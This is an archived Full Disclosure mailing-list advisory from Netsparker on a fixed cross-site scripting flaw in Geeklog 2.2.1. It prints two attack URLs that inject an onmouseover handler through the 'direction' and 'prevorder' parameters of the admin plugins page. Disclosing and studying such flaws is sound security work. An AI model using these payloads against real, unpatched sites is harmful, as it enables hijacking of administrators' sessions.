lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAKD6+R4BsDdGOO7-rSVieL43Vj=L3F6ci1RtGb9V9EYMMUg54g@mail.gmail.com> Date: Mon, 27 Apr 2020 13:53:53 +0200 From: Daniel Bishtawi <daniel@...sparker.com> To: fulldisclosure@...lists.org, vuln@...unia.com, bugs@...uritytracker.com, submissions@...ketstormsecurity.org Subject: [FD] Cross-Site Scripting Vulnerability in Geeklog 2.2.1 Hello, We are informing you about a Cross-Site Scripting Vulnerability in Geeklog 2.2.1. Here are the details: Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerability in Geeklog Affected Software: Geeklog Affected Versions: 2.2.1 Vendor Homepage: https://www.geeklog.net/ Vulnerability Type: Cross-Site Scripting Severity: Important Status: Fixed CVSS Score (3.0): 7.4 (High) Netsparker Advisory Reference: NS-20-001 Technical Details -------------------- URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x "%20onmouseover=netsparker(0x01AAEC)%20x="&order=1&prevorder=pi_load Parameter Name : direction Parameter Type : GET Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22 URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC&order=1&prevorder=x "%20onmouseover=netsparker(0x019E05)%20x=" Parameter Name : prevorder Parameter Type : GET Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22 For more information: https://www.netsparker.com/web-applications-advisories/ns-20-001-cross-site-scripting-in-geeklog/ Regards, [image: upload image] Daniel Bishtawi | Marketing Administrator E: daniel@...sparker.com <daniel@...sparker.com> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists